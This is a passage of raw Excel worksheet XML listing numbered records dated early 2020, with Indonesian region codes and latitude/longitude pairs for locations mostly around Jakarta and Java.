      <c r="L444" t="s">
        <v>1999</v>
      </c>
      <c r="M444">
        <v>3175030001</v>
      </c>
      <c r="N444">
        <v>3175030</v>
      </c>
      <c r="O444">
        <v>3175</v>
      </c>
      <c r="P444">
        <v>31</v>
      </c>
      <c r="Q444" t="s">
        <v>1574</v>
      </c>
      <c r="R444" t="s">
        <v>1563</v>
      </c>
      <c r="S444" t="s">
        <v>547</v>
      </c>
      <c r="T444" t="s">
        <v>33</v>
      </c>
      <c r="U444" s="5">
        <v>10686036</v>
      </c>
      <c r="V444" s="5" t="s">
        <v>14862</v>
      </c>
      <c r="W444" s="5">
        <v>-613381</v>
      </c>
      <c r="X444" t="s">
        <v>18671</v>
      </c>
      <c r="Y444" t="str">
        <f t="shared" si="6"/>
        <v>-6.13381,106.86036</v>
      </c>
    </row>
    <row r="445" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A445">
        <v>102115</v>
      </c>
      <c r="B445" s="1">
        <v>43863</v>
      </c>
      <c r="C445">
        <v>0</v>
      </c>
      <c r="D445" t="s">
        <v>22</v>
      </c>
      <c r="E445" t="s">
        <v>23</v>
      </c>
      <c r="F445" t="s">
        <v>2000</v>
      </c>
      <c r="G445" t="s">
        <v>2001</v>
      </c>
      <c r="H445" t="s">
        <v>26</v>
      </c>
      <c r="I445" t="s">
        <v>2002</v>
      </c>
      <c r="J445" t="s">
        <v>1601</v>
      </c>
      <c r="L445" t="s">
        <v>2003</v>
      </c>
      <c r="M445">
        <v>3175030001</v>
      </c>
      <c r="N445">
        <v>3175030</v>
      </c>
      <c r="O445">
        <v>3175</v>
      </c>
      <c r="P445">
        <v>31</v>
      </c>
      <c r="Q445" t="s">
        <v>1574</v>
      </c>
      <c r="R445" t="s">
        <v>1563</v>
      </c>
      <c r="S445" t="s">
        <v>547</v>
      </c>
      <c r="T445" t="s">
        <v>33</v>
      </c>
      <c r="U445" s="5">
        <v>10686119</v>
      </c>
      <c r="V445" s="5" t="s">
        <v>14864</v>
      </c>
      <c r="W445" s="5">
        <v>-614500</v>
      </c>
      <c r="X445" t="s">
        <v>18673</v>
      </c>
      <c r="Y445" t="str">
        <f t="shared" si="6"/>
        <v>-6.14500,106.86119</v>
      </c>
    </row>
    <row r="446" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A446">
        <v>102116</v>
      </c>
      <c r="B446" s="1">
        <v>43863</v>
      </c>
      <c r="C446">
        <v>0</v>
      </c>
      <c r="D446" t="s">
        <v>22</v>
      </c>
      <c r="E446" t="s">
        <v>23</v>
      </c>
      <c r="F446" t="s">
        <v>2004</v>
      </c>
      <c r="H446" t="s">
        <v>26</v>
      </c>
      <c r="I446" t="s">
        <v>2005</v>
      </c>
      <c r="J446" t="s">
        <v>2006</v>
      </c>
      <c r="L446" t="s">
        <v>2007</v>
      </c>
      <c r="M446">
        <v>3174040006</v>
      </c>
      <c r="N446">
        <v>3174040</v>
      </c>
      <c r="O446">
        <v>3174</v>
      </c>
      <c r="P446">
        <v>31</v>
      </c>
      <c r="Q446" t="s">
        <v>1553</v>
      </c>
      <c r="R446" t="s">
        <v>377</v>
      </c>
      <c r="S446" t="s">
        <v>32</v>
      </c>
      <c r="T446" t="s">
        <v>33</v>
      </c>
      <c r="U446" s="5">
        <v>10677257</v>
      </c>
      <c r="V446" s="5" t="s">
        <v>14707</v>
      </c>
      <c r="W446" s="5">
        <v>-615993</v>
      </c>
      <c r="X446" t="s">
        <v>18674</v>
      </c>
      <c r="Y446" t="str">
        <f t="shared" si="6"/>
        <v>-6.15993,106.77257</v>
      </c>
    </row>
    <row r="447" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A447">
        <v>102117</v>
      </c>
      <c r="B447" s="1">
        <v>43863</v>
      </c>
      <c r="C447">
        <v>0</v>
      </c>
      <c r="D447" t="s">
        <v>85</v>
      </c>
      <c r="E447" t="s">
        <v>23</v>
      </c>
      <c r="F447" t="s">
        <v>2008</v>
      </c>
      <c r="G447" t="s">
        <v>2009</v>
      </c>
      <c r="H447" t="s">
        <v>26</v>
      </c>
      <c r="J447" t="s">
        <v>37</v>
      </c>
      <c r="K447" t="s">
        <v>2010</v>
      </c>
      <c r="L447" t="s">
        <v>2011</v>
      </c>
      <c r="M447">
        <v>3216071008</v>
      </c>
      <c r="N447">
        <v>3216071</v>
      </c>
      <c r="O447">
        <v>3216</v>
      </c>
      <c r="P447">
        <v>32</v>
      </c>
      <c r="Q447" t="s">
        <v>2012</v>
      </c>
      <c r="R447" t="s">
        <v>2013</v>
      </c>
      <c r="S447" t="s">
        <v>41</v>
      </c>
      <c r="T447" t="s">
        <v>42</v>
      </c>
      <c r="U447" s="5">
        <v>10710229</v>
      </c>
      <c r="V447" s="5" t="s">
        <v>14865</v>
      </c>
      <c r="W447" s="5">
        <v>-627374</v>
      </c>
      <c r="X447" t="s">
        <v>18675</v>
      </c>
      <c r="Y447" t="str">
        <f t="shared" si="6"/>
        <v>-6.27374,107.10229</v>
      </c>
    </row>
    <row r="448" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A448">
        <v>102118</v>
      </c>
      <c r="B448" s="1">
        <v>43863</v>
      </c>
      <c r="C448">
        <v>0</v>
      </c>
      <c r="D448" t="s">
        <v>22</v>
      </c>
      <c r="E448" t="s">
        <v>23</v>
      </c>
      <c r="F448" t="s">
        <v>2014</v>
      </c>
      <c r="G448" t="s">
        <v>2015</v>
      </c>
      <c r="H448" t="s">
        <v>26</v>
      </c>
      <c r="I448" t="s">
        <v>2016</v>
      </c>
      <c r="J448" t="s">
        <v>2017</v>
      </c>
      <c r="L448" t="s">
        <v>2018</v>
      </c>
      <c r="M448">
        <v>3175010003</v>
      </c>
      <c r="N448">
        <v>3175010</v>
      </c>
      <c r="O448">
        <v>3175</v>
      </c>
      <c r="P448">
        <v>31</v>
      </c>
      <c r="Q448" t="s">
        <v>545</v>
      </c>
      <c r="R448" t="s">
        <v>546</v>
      </c>
      <c r="S448" t="s">
        <v>547</v>
      </c>
      <c r="T448" t="s">
        <v>33</v>
      </c>
      <c r="U448" s="5">
        <v>10678288</v>
      </c>
      <c r="V448" s="5" t="s">
        <v>14866</v>
      </c>
      <c r="W448" s="5">
        <v>-613964</v>
      </c>
      <c r="X448" t="s">
        <v>18676</v>
      </c>
      <c r="Y448" t="str">
        <f t="shared" si="6"/>
        <v>-6.13964,106.78288</v>
      </c>
    </row>
    <row r="449" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A449">
        <v>102119</v>
      </c>
      <c r="B449" s="1">
        <v>43863</v>
      </c>
      <c r="C449">
        <v>0</v>
      </c>
      <c r="D449" t="s">
        <v>22</v>
      </c>
      <c r="E449" t="s">
        <v>23</v>
      </c>
      <c r="F449" t="s">
        <v>2019</v>
      </c>
      <c r="G449" t="s">
        <v>2020</v>
      </c>
      <c r="H449" t="s">
        <v>26</v>
      </c>
      <c r="I449" t="s">
        <v>1909</v>
      </c>
      <c r="J449" t="s">
        <v>2021</v>
      </c>
      <c r="M449">
        <v>3175030001</v>
      </c>
      <c r="N449">
        <v>3175030</v>
      </c>
      <c r="O449">
        <v>3175</v>
      </c>
      <c r="P449">
        <v>31</v>
      </c>
      <c r="Q449" t="s">
        <v>1574</v>
      </c>
      <c r="R449" t="s">
        <v>1563</v>
      </c>
      <c r="S449" t="s">
        <v>547</v>
      </c>
      <c r="T449" t="s">
        <v>33</v>
      </c>
      <c r="U449" s="5">
        <v>10686438</v>
      </c>
      <c r="V449" s="5" t="s">
        <v>14867</v>
      </c>
      <c r="W449" s="5">
        <v>-613571</v>
      </c>
      <c r="X449" t="s">
        <v>18677</v>
      </c>
      <c r="Y449" t="str">
        <f t="shared" si="6"/>
        <v>-6.13571,106.86438</v>
      </c>
    </row>
    <row r="450" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A450">
        <v>102120</v>
      </c>
      <c r="B450" s="1">
        <v>43863</v>
      </c>
      <c r="C450">
        <v>0</v>
      </c>
      <c r="D450" t="s">
        <v>22</v>
      </c>
      <c r="E450" t="s">
        <v>23</v>
      </c>
      <c r="F450" t="s">
        <v>2022</v>
      </c>
      <c r="G450" t="s">
        <v>2023</v>
      </c>
      <c r="H450" t="s">
        <v>26</v>
      </c>
      <c r="I450" t="s">
        <v>1194</v>
      </c>
      <c r="J450" t="s">
        <v>2024</v>
      </c>
      <c r="L450" t="s">
        <v>2025</v>
      </c>
      <c r="M450">
        <v>3175030005</v>
      </c>
      <c r="N450">
        <v>3175030</v>
      </c>
      <c r="O450">
        <v>3175</v>
      </c>
      <c r="P450">
        <v>31</v>
      </c>
      <c r="Q450" t="s">
        <v>1568</v>
      </c>
      <c r="R450" t="s">
        <v>1563</v>
      </c>
      <c r="S450" t="s">
        <v>547</v>
      </c>
      <c r="T450" t="s">
        <v>33</v>
      </c>
      <c r="U450" s="5">
        <v>10688281</v>
      </c>
      <c r="V450" s="5" t="s">
        <v>14868</v>
      </c>
      <c r="W450" s="5">
        <v>-613143</v>
      </c>
      <c r="X450" t="s">
        <v>18678</v>
      </c>
      <c r="Y450" t="str">
        <f t="shared" si="6"/>
        <v>-6.13143,106.88281</v>
      </c>
    </row>
    <row r="451" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A451">
        <v>102121</v>
      </c>
      <c r="B451" s="1">
        <v>43863</v>
      </c>
      <c r="C451">
        <v>0</v>
      </c>
      <c r="D451" t="s">
        <v>22</v>
      </c>
      <c r="E451" t="s">
        <v>23</v>
      </c>
      <c r="F451" t="s">
        <v>2026</v>
      </c>
      <c r="G451" t="s">
        <v>2027</v>
      </c>
      <c r="H451" t="s">
        <v>26</v>
      </c>
      <c r="I451" t="s">
        <v>2028</v>
      </c>
      <c r="J451" t="s">
        <v>2029</v>
      </c>
      <c r="M451">
        <v>3174070003</v>
      </c>
      <c r="N451">
        <v>3174070</v>
      </c>
      <c r="O451">
        <v>3174</v>
      </c>
      <c r="P451">
        <v>31</v>
      </c>
      <c r="Q451" t="s">
        <v>1260</v>
      </c>
      <c r="R451" t="s">
        <v>84</v>
      </c>
      <c r="S451" t="s">
        <v>32</v>
      </c>
      <c r="T451" t="s">
        <v>33</v>
      </c>
      <c r="U451" s="5">
        <v>10674968</v>
      </c>
      <c r="V451" s="5" t="s">
        <v>14869</v>
      </c>
      <c r="W451" s="5">
        <v>-615420</v>
      </c>
      <c r="X451" t="s">
        <v>18679</v>
      </c>
      <c r="Y451" t="str">
        <f t="shared" ref="Y451:Y514" si="7">CONCATENATE(X451,",",V451)</f>
        <v>-6.15420,106.74968</v>
      </c>
    </row>
    <row r="452" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A452">
        <v>102122</v>
      </c>
      <c r="B452" s="1">
        <v>43863</v>
      </c>
      <c r="C452">
        <v>0</v>
      </c>
      <c r="D452" t="s">
        <v>22</v>
      </c>
      <c r="E452" t="s">
        <v>23</v>
      </c>
      <c r="F452" t="s">
        <v>2030</v>
      </c>
      <c r="G452" t="s">
        <v>2031</v>
      </c>
      <c r="H452" t="s">
        <v>26</v>
      </c>
      <c r="I452" t="s">
        <v>517</v>
      </c>
      <c r="J452" t="s">
        <v>2032</v>
      </c>
      <c r="L452" t="s">
        <v>2033</v>
      </c>
      <c r="M452">
        <v>3174020007</v>
      </c>
      <c r="N452">
        <v>3174020</v>
      </c>
      <c r="O452">
        <v>3174</v>
      </c>
      <c r="P452">
        <v>31</v>
      </c>
      <c r="Q452" t="s">
        <v>95</v>
      </c>
      <c r="R452" t="s">
        <v>31</v>
      </c>
      <c r="S452" t="s">
        <v>32</v>
      </c>
      <c r="T452" t="s">
        <v>33</v>
      </c>
      <c r="U452" s="5">
        <v>10676623</v>
      </c>
      <c r="V452" s="5" t="s">
        <v>14870</v>
      </c>
      <c r="W452" s="5">
        <v>-616342</v>
      </c>
      <c r="X452" t="s">
        <v>18680</v>
      </c>
      <c r="Y452" t="str">
        <f t="shared" si="7"/>
        <v>-6.16342,106.76623</v>
      </c>
    </row>
    <row r="453" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A453">
        <v>102123</v>
      </c>
      <c r="B453" s="1">
        <v>43863</v>
      </c>
      <c r="C453">
        <v>0</v>
      </c>
      <c r="D453" t="s">
        <v>22</v>
      </c>
      <c r="E453" t="s">
        <v>23</v>
      </c>
      <c r="F453" t="s">
        <v>2034</v>
      </c>
      <c r="G453" t="s">
        <v>2035</v>
      </c>
      <c r="H453" t="s">
        <v>26</v>
      </c>
      <c r="I453" t="s">
        <v>882</v>
      </c>
      <c r="J453" t="s">
        <v>2036</v>
      </c>
      <c r="L453" t="s">
        <v>2037</v>
      </c>
      <c r="M453">
        <v>3173070001</v>
      </c>
      <c r="N453">
        <v>3173070</v>
      </c>
      <c r="O453">
        <v>3173</v>
      </c>
      <c r="P453">
        <v>31</v>
      </c>
      <c r="Q453" t="s">
        <v>322</v>
      </c>
      <c r="R453" t="s">
        <v>323</v>
      </c>
      <c r="S453" t="s">
        <v>62</v>
      </c>
      <c r="T453" t="s">
        <v>33</v>
      </c>
      <c r="U453" s="5">
        <v>10683532</v>
      </c>
      <c r="V453" s="5" t="s">
        <v>14871</v>
      </c>
      <c r="W453" s="5">
        <v>-615802</v>
      </c>
      <c r="X453" t="s">
        <v>18681</v>
      </c>
      <c r="Y453" t="str">
        <f t="shared" si="7"/>
        <v>-6.15802,106.83532</v>
      </c>
    </row>
    <row r="454" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A454">
        <v>102124</v>
      </c>
      <c r="B454" s="1">
        <v>43863</v>
      </c>
      <c r="C454">
        <v>0</v>
      </c>
      <c r="D454" t="s">
        <v>22</v>
      </c>
      <c r="E454" t="s">
        <v>23</v>
      </c>
      <c r="F454" t="s">
        <v>2038</v>
      </c>
      <c r="G454" t="s">
        <v>2039</v>
      </c>
      <c r="H454" t="s">
        <v>26</v>
      </c>
      <c r="I454" t="s">
        <v>166</v>
      </c>
      <c r="J454" t="s">
        <v>2040</v>
      </c>
      <c r="M454">
        <v>3173020005</v>
      </c>
      <c r="N454">
        <v>3173020</v>
      </c>
      <c r="O454">
        <v>3173</v>
      </c>
      <c r="P454">
        <v>31</v>
      </c>
      <c r="Q454" t="s">
        <v>2041</v>
      </c>
      <c r="R454" t="s">
        <v>179</v>
      </c>
      <c r="S454" t="s">
        <v>62</v>
      </c>
      <c r="T454" t="s">
        <v>33</v>
      </c>
      <c r="U454" s="5">
        <v>10682924</v>
      </c>
      <c r="V454" s="5" t="s">
        <v>14872</v>
      </c>
      <c r="W454" s="5">
        <v>-618534</v>
      </c>
      <c r="X454" t="s">
        <v>18682</v>
      </c>
      <c r="Y454" t="str">
        <f t="shared" si="7"/>
        <v>-6.18534,106.82924</v>
      </c>
    </row>
    <row r="455" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A455">
        <v>102125</v>
      </c>
      <c r="B455" s="1">
        <v>43863</v>
      </c>
      <c r="C455">
        <v>0</v>
      </c>
      <c r="D455" t="s">
        <v>22</v>
      </c>
      <c r="E455" t="s">
        <v>23</v>
      </c>
      <c r="F455" t="s">
        <v>2042</v>
      </c>
      <c r="H455" t="s">
        <v>26</v>
      </c>
      <c r="I455" t="s">
        <v>2005</v>
      </c>
      <c r="J455" t="s">
        <v>2043</v>
      </c>
      <c r="L455" t="s">
        <v>2044</v>
      </c>
      <c r="M455">
        <v>3174020005</v>
      </c>
      <c r="N455">
        <v>3174020</v>
      </c>
      <c r="O455">
        <v>3174</v>
      </c>
      <c r="P455">
        <v>31</v>
      </c>
      <c r="Q455" t="s">
        <v>30</v>
      </c>
      <c r="R455" t="s">
        <v>31</v>
      </c>
      <c r="S455" t="s">
        <v>32</v>
      </c>
      <c r="T455" t="s">
        <v>33</v>
      </c>
      <c r="U455" s="5">
        <v>10677217</v>
      </c>
      <c r="V455" s="5" t="s">
        <v>14873</v>
      </c>
      <c r="W455" s="5">
        <v>-617700</v>
      </c>
      <c r="X455" t="s">
        <v>18683</v>
      </c>
      <c r="Y455" t="str">
        <f t="shared" si="7"/>
        <v>-6.17700,106.77217</v>
      </c>
    </row>
    <row r="456" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A456">
        <v>102126</v>
      </c>
      <c r="B456" s="1">
        <v>43863</v>
      </c>
      <c r="C456">
        <v>0</v>
      </c>
      <c r="D456" t="s">
        <v>22</v>
      </c>
      <c r="E456" t="s">
        <v>23</v>
      </c>
      <c r="F456" t="s">
        <v>2045</v>
      </c>
      <c r="H456" t="s">
        <v>26</v>
      </c>
      <c r="I456" t="s">
        <v>72</v>
      </c>
      <c r="J456" t="s">
        <v>1519</v>
      </c>
      <c r="L456" t="s">
        <v>2046</v>
      </c>
      <c r="M456">
        <v>3175010003</v>
      </c>
      <c r="N456">
        <v>3175010</v>
      </c>
      <c r="O456">
        <v>3175</v>
      </c>
      <c r="P456">
        <v>31</v>
      </c>
      <c r="Q456" t="s">
        <v>545</v>
      </c>
      <c r="R456" t="s">
        <v>546</v>
      </c>
      <c r="S456" t="s">
        <v>547</v>
      </c>
      <c r="T456" t="s">
        <v>33</v>
      </c>
      <c r="U456" s="5">
        <v>10677740</v>
      </c>
      <c r="V456" s="5" t="s">
        <v>14874</v>
      </c>
      <c r="W456" s="5">
        <v>-614205</v>
      </c>
      <c r="X456" t="s">
        <v>18684</v>
      </c>
      <c r="Y456" t="str">
        <f t="shared" si="7"/>
        <v>-6.14205,106.77740</v>
      </c>
    </row>
    <row r="457" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A457">
        <v>102127</v>
      </c>
      <c r="B457" s="1">
        <v>43863</v>
      </c>
      <c r="C457">
        <v>0</v>
      </c>
      <c r="D457" t="s">
        <v>22</v>
      </c>
      <c r="E457" t="s">
        <v>23</v>
      </c>
      <c r="F457" t="s">
        <v>2047</v>
      </c>
      <c r="G457" t="s">
        <v>2048</v>
      </c>
      <c r="H457" t="s">
        <v>26</v>
      </c>
      <c r="I457" t="s">
        <v>1009</v>
      </c>
      <c r="J457" t="s">
        <v>2049</v>
      </c>
      <c r="L457" t="s">
        <v>2050</v>
      </c>
      <c r="M457">
        <v>3174020005</v>
      </c>
      <c r="N457">
        <v>3174020</v>
      </c>
      <c r="O457">
        <v>3174</v>
      </c>
      <c r="P457">
        <v>31</v>
      </c>
      <c r="Q457" t="s">
        <v>30</v>
      </c>
      <c r="R457" t="s">
        <v>31</v>
      </c>
      <c r="S457" t="s">
        <v>32</v>
      </c>
      <c r="T457" t="s">
        <v>33</v>
      </c>
      <c r="U457" s="5">
        <v>10676694</v>
      </c>
      <c r="V457" s="5" t="s">
        <v>14875</v>
      </c>
      <c r="W457" s="5">
        <v>-617770</v>
      </c>
      <c r="X457" t="s">
        <v>18685</v>
      </c>
      <c r="Y457" t="str">
        <f t="shared" si="7"/>
        <v>-6.17770,106.76694</v>
      </c>
    </row>
    <row r="458" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A458">
        <v>102128</v>
      </c>
      <c r="B458" s="1">
        <v>43863</v>
      </c>
      <c r="C458">
        <v>0</v>
      </c>
      <c r="D458" t="s">
        <v>22</v>
      </c>
      <c r="E458" t="s">
        <v>23</v>
      </c>
      <c r="F458" t="s">
        <v>2051</v>
      </c>
      <c r="G458" t="s">
        <v>2052</v>
      </c>
      <c r="H458" t="s">
        <v>26</v>
      </c>
      <c r="I458" t="s">
        <v>1862</v>
      </c>
      <c r="J458" t="s">
        <v>1128</v>
      </c>
      <c r="L458" t="s">
        <v>2053</v>
      </c>
      <c r="M458">
        <v>3313150004</v>
      </c>
      <c r="N458">
        <v>3313150</v>
      </c>
      <c r="O458">
        <v>3313</v>
      </c>
      <c r="P458">
        <v>33</v>
      </c>
      <c r="Q458" t="s">
        <v>2054</v>
      </c>
      <c r="R458" t="s">
        <v>2055</v>
      </c>
      <c r="S458" t="s">
        <v>2056</v>
      </c>
      <c r="T458" t="s">
        <v>1134</v>
      </c>
      <c r="U458" s="5">
        <v>11101084</v>
      </c>
      <c r="V458" s="5" t="s">
        <v>14876</v>
      </c>
      <c r="W458" s="5">
        <v>-755574</v>
      </c>
      <c r="X458" t="s">
        <v>18686</v>
      </c>
      <c r="Y458" t="str">
        <f t="shared" si="7"/>
        <v>-7.55574,111.01084</v>
      </c>
    </row>
    <row r="459" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A459">
        <v>102129</v>
      </c>
      <c r="B459" s="1">
        <v>43863</v>
      </c>
      <c r="C459">
        <v>0</v>
      </c>
      <c r="D459" t="s">
        <v>85</v>
      </c>
      <c r="E459" t="s">
        <v>23</v>
      </c>
      <c r="F459" t="s">
        <v>2057</v>
      </c>
      <c r="G459" t="s">
        <v>2058</v>
      </c>
      <c r="H459" t="s">
        <v>26</v>
      </c>
      <c r="J459" t="s">
        <v>2059</v>
      </c>
      <c r="K459" t="s">
        <v>2060</v>
      </c>
      <c r="L459" t="s">
        <v>2061</v>
      </c>
      <c r="M459">
        <v>3175040003</v>
      </c>
      <c r="N459">
        <v>3175040</v>
      </c>
      <c r="O459">
        <v>3175</v>
      </c>
      <c r="P459">
        <v>31</v>
      </c>
      <c r="Q459" t="s">
        <v>2062</v>
      </c>
      <c r="R459" t="s">
        <v>2063</v>
      </c>
      <c r="S459" t="s">
        <v>547</v>
      </c>
      <c r="T459" t="s">
        <v>33</v>
      </c>
      <c r="U459" s="5">
        <v>10690788</v>
      </c>
      <c r="V459" s="5" t="s">
        <v>14877</v>
      </c>
      <c r="W459" s="5">
        <v>-612320</v>
      </c>
      <c r="X459" t="s">
        <v>18687</v>
      </c>
      <c r="Y459" t="str">
        <f t="shared" si="7"/>
        <v>-6.12320,106.90788</v>
      </c>
    </row>
    <row r="460" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A460">
        <v>102130</v>
      </c>
      <c r="B460" s="1">
        <v>43863</v>
      </c>
      <c r="C460">
        <v>0</v>
      </c>
      <c r="D460" t="s">
        <v>22</v>
      </c>
      <c r="E460" t="s">
        <v>23</v>
      </c>
      <c r="F460" t="s">
        <v>2064</v>
      </c>
      <c r="G460" t="s">
        <v>2065</v>
      </c>
      <c r="H460" t="s">
        <v>26</v>
      </c>
      <c r="I460" t="s">
        <v>27</v>
      </c>
      <c r="J460" t="s">
        <v>37</v>
      </c>
      <c r="L460" t="s">
        <v>2066</v>
      </c>
      <c r="M460">
        <v>3674040007</v>
      </c>
      <c r="N460">
        <v>3674040</v>
      </c>
      <c r="O460">
        <v>3674</v>
      </c>
      <c r="P460">
        <v>36</v>
      </c>
      <c r="Q460" t="s">
        <v>228</v>
      </c>
      <c r="R460" t="s">
        <v>229</v>
      </c>
      <c r="S460" t="s">
        <v>170</v>
      </c>
      <c r="T460" t="s">
        <v>171</v>
      </c>
      <c r="U460" s="5">
        <v>10674689</v>
      </c>
      <c r="V460" s="5" t="s">
        <v>14878</v>
      </c>
      <c r="W460" s="5">
        <v>-631601</v>
      </c>
      <c r="X460" t="s">
        <v>18688</v>
      </c>
      <c r="Y460" t="str">
        <f t="shared" si="7"/>
        <v>-6.31601,106.74689</v>
      </c>
    </row>
    <row r="461" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A461">
        <v>102132</v>
      </c>
      <c r="B461" s="1">
        <v>43863</v>
      </c>
      <c r="C461">
        <v>1</v>
      </c>
      <c r="D461" t="s">
        <v>22</v>
      </c>
      <c r="E461" t="s">
        <v>23</v>
      </c>
      <c r="F461" t="s">
        <v>2067</v>
      </c>
      <c r="G461" t="s">
        <v>2068</v>
      </c>
      <c r="H461" t="s">
        <v>26</v>
      </c>
      <c r="I461" t="s">
        <v>1359</v>
      </c>
      <c r="J461" t="s">
        <v>1342</v>
      </c>
      <c r="L461" t="s">
        <v>2069</v>
      </c>
      <c r="M461">
        <v>3515110014</v>
      </c>
      <c r="N461">
        <v>3515110</v>
      </c>
      <c r="O461">
        <v>3515</v>
      </c>
      <c r="P461">
        <v>35</v>
      </c>
      <c r="Q461" t="s">
        <v>2070</v>
      </c>
      <c r="R461" t="s">
        <v>1928</v>
      </c>
      <c r="S461" t="s">
        <v>1928</v>
      </c>
      <c r="T461" t="s">
        <v>1221</v>
      </c>
      <c r="U461" s="5">
        <v>11272022</v>
      </c>
      <c r="V461" s="5" t="s">
        <v>14879</v>
      </c>
      <c r="W461" s="5">
        <v>-745344</v>
      </c>
      <c r="X461" t="s">
        <v>18689</v>
      </c>
      <c r="Y461" t="str">
        <f t="shared" si="7"/>
        <v>-7.45344,112.72022</v>
      </c>
    </row>
    <row r="462" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A462">
        <v>102133</v>
      </c>
      <c r="B462" s="1">
        <v>43863</v>
      </c>
      <c r="C462">
        <v>1</v>
      </c>
      <c r="D462" t="s">
        <v>22</v>
      </c>
      <c r="E462" t="s">
        <v>23</v>
      </c>
      <c r="F462" t="s">
        <v>2071</v>
      </c>
      <c r="G462" t="s">
        <v>2072</v>
      </c>
      <c r="H462" t="s">
        <v>26</v>
      </c>
      <c r="I462" t="s">
        <v>2073</v>
      </c>
      <c r="J462" t="s">
        <v>1342</v>
      </c>
      <c r="L462" t="s">
        <v>2074</v>
      </c>
      <c r="M462">
        <v>3578160003</v>
      </c>
      <c r="N462">
        <v>3578160</v>
      </c>
      <c r="O462">
        <v>3578</v>
      </c>
      <c r="P462">
        <v>35</v>
      </c>
      <c r="Q462" t="s">
        <v>1883</v>
      </c>
      <c r="R462" t="s">
        <v>1884</v>
      </c>
      <c r="S462" t="s">
        <v>1346</v>
      </c>
      <c r="T462" t="s">
        <v>1221</v>
      </c>
      <c r="U462" s="5">
        <v>11270163</v>
      </c>
      <c r="V462" s="5" t="s">
        <v>14880</v>
      </c>
      <c r="W462" s="5">
        <v>-727476</v>
      </c>
      <c r="X462" t="s">
        <v>18690</v>
      </c>
      <c r="Y462" t="str">
        <f t="shared" si="7"/>
        <v>-7.27476,112.70163</v>
      </c>
    </row>
    <row r="463" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A463">
        <v>102134</v>
      </c>
      <c r="B463" s="1">
        <v>43864</v>
      </c>
      <c r="C463">
        <v>0</v>
      </c>
      <c r="D463" t="s">
        <v>85</v>
      </c>
      <c r="E463" t="s">
        <v>23</v>
      </c>
      <c r="F463" t="s">
        <v>2075</v>
      </c>
      <c r="G463" t="s">
        <v>2076</v>
      </c>
      <c r="H463" t="s">
        <v>26</v>
      </c>
      <c r="J463" t="s">
        <v>1128</v>
      </c>
      <c r="K463" t="s">
        <v>2077</v>
      </c>
      <c r="L463" t="s">
        <v>2078</v>
      </c>
      <c r="M463">
        <v>1803121006</v>
      </c>
      <c r="N463">
        <v>1803121</v>
      </c>
      <c r="O463">
        <v>1803</v>
      </c>
      <c r="P463">
        <v>18</v>
      </c>
      <c r="Q463" t="s">
        <v>2079</v>
      </c>
      <c r="R463" t="s">
        <v>2080</v>
      </c>
      <c r="S463" t="s">
        <v>2081</v>
      </c>
      <c r="T463" t="s">
        <v>2082</v>
      </c>
      <c r="U463" s="5">
        <v>10576244</v>
      </c>
      <c r="V463" s="5" t="s">
        <v>14881</v>
      </c>
      <c r="W463" s="5">
        <v>-565025</v>
      </c>
      <c r="X463" t="s">
        <v>18691</v>
      </c>
      <c r="Y463" t="str">
        <f t="shared" si="7"/>
        <v>-5.65025,105.76244</v>
      </c>
    </row>
    <row r="464" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A464">
        <v>102135</v>
      </c>
      <c r="B464" s="1">
        <v>43864</v>
      </c>
      <c r="C464">
        <v>0</v>
      </c>
      <c r="D464" t="s">
        <v>22</v>
      </c>
      <c r="E464" t="s">
        <v>23</v>
      </c>
      <c r="F464" t="s">
        <v>2083</v>
      </c>
      <c r="H464" t="s">
        <v>26</v>
      </c>
      <c r="I464" t="s">
        <v>2084</v>
      </c>
      <c r="J464" t="s">
        <v>37</v>
      </c>
      <c r="L464" t="s">
        <v>2085</v>
      </c>
      <c r="M464">
        <v>3674030001</v>
      </c>
      <c r="N464">
        <v>3674030</v>
      </c>
      <c r="O464">
        <v>3674</v>
      </c>
      <c r="P464">
        <v>36</v>
      </c>
      <c r="Q464" t="s">
        <v>2086</v>
      </c>
      <c r="R464" t="s">
        <v>245</v>
      </c>
      <c r="S464" t="s">
        <v>170</v>
      </c>
      <c r="T464" t="s">
        <v>171</v>
      </c>
      <c r="U464" s="5">
        <v>10671184</v>
      </c>
      <c r="V464" s="5" t="s">
        <v>14882</v>
      </c>
      <c r="W464" s="5">
        <v>-634904</v>
      </c>
      <c r="X464" t="s">
        <v>18692</v>
      </c>
      <c r="Y464" t="str">
        <f t="shared" si="7"/>
        <v>-6.34904,106.71184</v>
      </c>
    </row>
    <row r="465" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A465">
        <v>102136</v>
      </c>
      <c r="B465" s="1">
        <v>43864</v>
      </c>
      <c r="C465">
        <v>1</v>
      </c>
      <c r="D465" t="s">
        <v>22</v>
      </c>
      <c r="E465" t="s">
        <v>23</v>
      </c>
      <c r="F465" t="s">
        <v>2087</v>
      </c>
      <c r="G465" t="s">
        <v>2088</v>
      </c>
      <c r="H465" t="s">
        <v>26</v>
      </c>
      <c r="I465" t="s">
        <v>886</v>
      </c>
      <c r="J465" t="s">
        <v>37</v>
      </c>
      <c r="L465" t="s">
        <v>2089</v>
      </c>
      <c r="M465">
        <v>3603030010</v>
      </c>
      <c r="N465">
        <v>3603030</v>
      </c>
      <c r="O465">
        <v>3603</v>
      </c>
      <c r="P465">
        <v>36</v>
      </c>
      <c r="Q465" t="s">
        <v>2090</v>
      </c>
      <c r="R465" t="s">
        <v>2091</v>
      </c>
      <c r="S465" t="s">
        <v>201</v>
      </c>
      <c r="T465" t="s">
        <v>171</v>
      </c>
      <c r="U465" s="5">
        <v>10652679</v>
      </c>
